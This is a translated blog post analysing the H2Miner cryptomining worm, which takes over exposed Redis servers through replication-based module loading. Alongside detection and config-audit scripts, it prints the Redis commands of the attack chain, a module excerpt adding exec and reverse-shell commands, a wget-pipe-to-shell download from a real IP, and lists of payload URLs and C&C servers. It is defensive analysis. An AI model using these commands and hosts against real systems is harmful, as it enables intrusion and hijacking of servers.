New outbreak of H2Miner worms exploiting Redis RCE discovered

A day ago, one of my project’s servers was attacked by a similar worm. In search of an answer to the question “what was that?” I found a great article by the Alibaba Cloud Security team. Since I didn’t find this article on Habré, I decided to translate it especially for you <3

Introduction

Recently, the Alibaba Cloud security team observed a sudden outbreak of H2Miner. This malicious worm uses unauthenticated or weakly protected Redis instances as its entry point into your systems: it pushes its own malicious module to the victim through master-slave (replication) synchronization, so that the module lands on the attacked machine, where the worm then loads it and executes malicious commands.

Previously, such attacks were mostly carried out by writing scheduled tasks (cron entries) or SSH keys to the machine after the attacker had logged into Redis. Fortunately, that method often fails because of permission controls or differences between system versions. The module-loading method described here, however, lets the attacker execute commands directly or obtain a shell, which is far more dangerous for your system.

Because a very large number of Redis servers (nearly one million) are reachable from the Internet, the Alibaba Cloud security team, as a friendly reminder, recommends that users do not expose Redis to the Internet and regularly check that their passwords are strong and have not been compromised.

H2Miner

H2Miner is a mining botnet targeting Linux systems. It can break into your system in several ways, including missing authorization in Hadoop YARN and Docker, and Redis remote command execution (RCE) vulnerabilities. The botnet works by downloading malicious scripts and malware to mine cryptocurrency on your hosts, spread laterally to other machines, and maintain command-and-control (C&C) communication.

Redis RCE

This technique was presented by Pavel Toporkov at ZeroNights 2018. Since version 4.0, Redis supports loading modules: users can load .so files compiled from C into Redis to implement custom Redis commands. Useful as it is, the feature can be abused: in master-slave mode, files are synchronized to the slave via a full resync (FULLRESYNC), and an attacker can use this to deliver a malicious .so file. Once the transfer completes, the attacker loads the module on the attacked Redis instance and executes arbitrary commands.

Malware Worm Analysis

Recently, the Alibaba Cloud security team found that the H2Miner mining botnet had suddenly grown dramatically. According to their analysis, the attack generally proceeds as follows:

[Figure: diagram of the attack process, shown in the original article]

H2Miner uses the Redis RCE for its full attack. The attackers first compromise Redis servers that are unprotected or use weak passwords.

They then run config set dbfilename red2.so to change the name of the dump file, and execute slaveof to point the instance at a master address they control.

Once the attacked Redis instance establishes a master-slave connection with the attacker's malicious Redis, the attacker sends the infected module during full resynchronization (FULLRESYNC), so that the file red2.so is written to the attacked machine. The attackers then run module load ./red2.so to load the .so file. The module can execute the attacker's commands or open a reverse connection (backdoor) to the attacked machine.

/* Excerpt from the malicious module's load routine: it registers two custom
   Redis commands, "system.exec" (runs a command) and "system.rev" (reverse shell). */
if (RedisModule_CreateCommand(ctx, "system.exec",
    DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
    return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
    RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
    return REDISMODULE_ERR;

After executing a malicious command such as /bin/sh -c "wget -q -O- http://195.3.146.118/unk.sh | sh > /dev/null 2>&1", the attacker restores the dump file name and unloads the system module to cover their tracks. The red2.so file, however, remains on the attacked machine, so users are advised to look for such a suspicious file in the working directory of their Redis instance.
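The three-step sequence described above (CONFIG SET dbfilename to a .so name, SLAVEOF/REPLICAOF to an external master, then MODULE LOAD) is unusual for any legitimate client and can be spotted in Redis MONITOR output. The following Python detector is an added example and is not part of the original article or the Alibaba Cloud analysis; the MONITOR lines, client addresses and timestamps it runs on are constructed for illustration, and the function names are the example's own.

```python
import re
from collections import defaultdict

# One line of Redis MONITOR output looks like:
#   <unix time> [<db> <client ip>:<port>] "CMD" "arg1" "arg2" ...
MONITOR_LINE = re.compile(
    r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<argv>.*)$')
QUOTED_ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')


def parse_monitor_line(line):
    """Split one MONITOR line into timestamp, client address, command and arguments."""
    m = MONITOR_LINE.match(line.strip())
    if m is None:
        return None
    argv = QUOTED_ARG.findall(m.group('argv'))
    if not argv:
        return None
    return {'ts': float(m.group('ts')), 'client': m.group('client'),
            'cmd': argv[0].upper(), 'args': argv[1:]}


def classify_stage(event):
    """Map a command to a stage of the module-loading chain, or None if unrelated."""
    cmd = event['cmd']
    args = [a.lower() for a in event['args']]
    if (cmd == 'CONFIG' and len(args) >= 3 and args[0] == 'set'
            and args[1] == 'dbfilename' and args[2].endswith('.so')):
        return 'dbfilename_so'      # dump file renamed to a shared object
    if cmd in ('SLAVEOF', 'REPLICAOF') and args and args[0] != 'no':
        return 'replicaof'          # instance pointed at an external master
    if cmd == 'MODULE' and args and args[0] == 'load':
        return 'module_load'        # shared object loaded as a module
    return None


def detect_module_chain(lines):
    """Return (client, stages seen, module path) for every client that issued
    MODULE LOAD after first renaming the dump file to a .so."""
    stages_by_client = defaultdict(list)
    findings = []
    for line in lines:
        event = parse_monitor_line(line)
        if event is None:
            continue
        stage = classify_stage(event)
        if stage is None:
            continue
        seen = stages_by_client[event['client']]
        if stage not in seen:
            seen.append(stage)
        if stage == 'module_load' and 'dbfilename_so' in seen:
            path = event['args'][1] if len(event['args']) > 1 else ''
            findings.append((event['client'], tuple(seen), path))
    return findings


# Constructed MONITOR lines: one client runs the chain, another does ordinary work.
SAMPLE_MONITOR = [
    '1580000000.100000 [0 203.0.113.7:41230] "CONFIG" "SET" "dbfilename" "red2.so"',
    '1580000000.200000 [0 203.0.113.7:41230] "SLAVEOF" "203.0.113.7" "6379"',
    '1580000001.300000 [0 203.0.113.7:41230] "MODULE" "LOAD" "./red2.so"',
    '1580000002.000000 [0 10.0.0.12:50112] "GET" "session:42"',
    '1580000003.000000 [0 10.0.0.12:50112] "CONFIG" "GET" "dbfilename"',
]

if __name__ == '__main__':
    for client, stages, path in detect_module_chain(SAMPLE_MONITOR):
        print(f'ALERT {client}: {" -> ".join(stages)} (module {path})')
```

Stages are tracked per client address, so a benign CONFIG GET from an application client does not contribute to the alert. In production the same logic can be fed from a MONITOR stream or from a proxy log; note that MONITOR itself costs throughput, so it is better run briefly during an investigation than permanently.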

Besides killing competing malicious processes that would steal resources, the malicious script goes on to download and execute the binary from 142.44.191.122/kinsing. A process or directory name containing "kinsing" on the host is therefore a sign that the machine has been infected by this malware.

According to the reverse engineering results, the malware mainly performs the following functions:

  • Downloading files and executing them
  • Mining
  • Maintaining C&C communication and executing attacker's commands


The malware uses masscan to scan external hosts and spread further. The IP address of the C&C server is hard-coded in the binary, and the infected host communicates with the C&C server over HTTP, reporting the zombie's (compromised server's) information in the HTTP headers, as in the request below.


GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
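The check-in above is easy to fingerprint on a proxy or IDS: a browser-style User-Agent on a bare GET /h to an IP address, carrying host-profile headers (Arch, Cores, Mem, Os, Uuid and so on) that no browser sends. The Python classifier below is an added example, not code from the article or from Alibaba Cloud; the scoring rules, threshold and function names are the example's own choices, and the two sample requests are constructed (the beacon sample reuses the header names from the capture above, with a placeholder Uuid).

```python
import re

# Host-profile headers the beacon carries (lower-cased); browsers never send these.
PROFILE_HEADERS = {'arch', 'cores', 'mem', 'os', 'osname', 'osversion',
                   'root', 's', 'uuid', 'version'}
BARE_IPV4 = re.compile(r'\d{1,3}(?:\.\d{1,3}){3}')


def parse_http_request(raw):
    """Parse the request line and headers of a raw HTTP/1.1 request (body ignored)."""
    head = re.split(r'\r?\n\r?\n', raw, maxsplit=1)[0]
    lines = [ln for ln in head.splitlines() if ln.strip()]
    method, path = lines[0].split()[:2]
    headers = {}
    for ln in lines[1:]:
        name, _, value = ln.partition(':')
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def beacon_indicators(raw):
    """Return the list of reasons this request looks like an H2Miner C&C check-in."""
    method, path, headers = parse_http_request(raw)
    reasons = []
    matched = PROFILE_HEADERS & set(headers)
    if len(matched) >= 4:
        reasons.append(f'{len(matched)} host-profile headers: {", ".join(sorted(matched))}')
    if 'Windows' in headers.get('user-agent', '') and headers.get('os', '').lower() == 'linux':
        reasons.append('Windows browser User-Agent from a host reporting Os: linux')
    if BARE_IPV4.fullmatch(headers.get('host', '')):
        reasons.append('bare IP address in Host header')
    if method == 'GET' and re.fullmatch(r'/[a-z]{1,2}', path):
        reasons.append(f'short opaque path {path}')
    return reasons


def is_beacon(raw, threshold=2):
    """Two or more independent indicators are treated as a positive match."""
    return len(beacon_indicators(raw)) >= threshold


# Constructed sample: the check-in shape from the article, Uuid replaced by a placeholder.
SAMPLE_BEACON = '\r\n'.join([
    'GET /h HTTP/1.1',
    'Host: 91.215.169.111',
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
    '(KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
    'Arch: amd64', 'Cores: 2', 'Mem: 3944', 'Os: linux', 'Osname: debian',
    'Osversion: 10.0', 'Root: false', 'S: k',
    'Uuid: 00000000-0000-0000-0000-000000000000', 'Version: 26',
    'Accept-Encoding: gzip',
]) + '\r\n\r\n'

# Constructed sample: an ordinary browser request that should not match.
SAMPLE_NORMAL = '\r\n'.join([
    'GET /index.html HTTP/1.1',
    'Host: www.example.com',
    'User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/71.0',
    'Accept: text/html',
    'Accept-Encoding: gzip',
]) + '\r\n\r\n'

if __name__ == '__main__':
    for name, req in (('beacon', SAMPLE_BEACON), ('normal', SAMPLE_NORMAL)):
        print(name, is_beacon(req), beacon_indicators(req))
```

The header-set rule alone is already a strong signal; the threshold of two indicators keeps a single odd header or a bare-IP Host (common for internal services) from producing false positives.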

Other attack methods

[Figure: other attack methods used by the worm, shown in the original article]

Addresses and links used by the worm

• /kinsing

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

C&C servers

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

Recommendations

First of all, Redis should not be reachable from the Internet and should be protected with a strong password. Users should also check that there is no red2.so file in the Redis working directory and that no file or process on the host has "kinsing" in its name.
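The hardening advice above can be checked mechanically against redis.conf: bind to loopback or an internal address, keep protected-mode on, set a long requirepass, and take CONFIG, SLAVEOF/REPLICAOF and MODULE away from application clients (via rename-command, or on Redis 7 also enable-module-command no). The auditor below is an added example, not code from the article or from Redis itself; the two configuration texts are constructed, the 16-character password floor is the example's own choice, and the placeholder password must be replaced with a real secret.

```python
from collections import defaultdict

# Commands the attack chain relies on; an ordinary application client never needs them.
ADMIN_COMMANDS = ('CONFIG', 'SLAVEOF', 'REPLICAOF', 'MODULE')


def parse_redis_conf(text):
    """Parse redis.conf into {directive: [values in file order]}; comments and blanks skipped."""
    directives = defaultdict(list)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        name, _, value = line.partition(' ')
        directives[name.lower()].append(value.strip())
    return directives


def audit_redis_conf(text):
    """Return a list of findings; an empty list means every check passed."""
    conf = parse_redis_conf(text)
    findings = []
    bind_addrs = [a for v in conf.get('bind', []) for a in v.split()]
    # With no bind line Redis listens on every interface; "-" prefixes (Redis 7) are ignored.
    if not bind_addrs or any(a.lstrip('-') in ('0.0.0.0', '*', '::') for a in bind_addrs):
        findings.append('bind: Redis listens on all interfaces (no bind line, or 0.0.0.0/* given)')
    if conf.get('protected-mode', ['yes'])[-1].lower() != 'yes':
        findings.append('protected-mode is disabled')
    password = conf.get('requirepass', [''])[-1].strip('"')
    if not password:
        findings.append('requirepass is not set: clients connect without authentication')
    elif len(password) < 16:
        findings.append('requirepass is shorter than 16 characters')
    renamed = {v.split()[0].upper() for v in conf.get('rename-command', []) if v.split()}
    for cmd in ADMIN_COMMANDS:
        if cmd not in renamed:
            findings.append(f'{cmd} is reachable by any authenticated client (no rename-command)')
    if conf.get('enable-module-command', ['no'])[-1].lower() != 'no':
        findings.append('enable-module-command is enabled (Redis 7+ directive)')
    return findings


# Constructed: the kind of configuration the worm finds on exposed servers.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dbfilename dump.rdb
"""

# Constructed: the corrected configuration (placeholder password, replace before use).
HARDENED_CONF = """
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass CHANGE-ME-to-a-long-random-secret
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
enable-module-command no
"""

if __name__ == '__main__':
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else WEAK_CONF
    for finding in audit_redis_conf(text) or ['no findings']:
        print(finding)
```

Run it with the path to a real redis.conf as the first argument; without one it audits the constructed weak configuration. On Redis 6 and later, ACLs that remove CONFIG and MODULE from application users are the cleaner way to achieve what rename-command does here, and the check could be extended to accept either.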

Source: habr.com
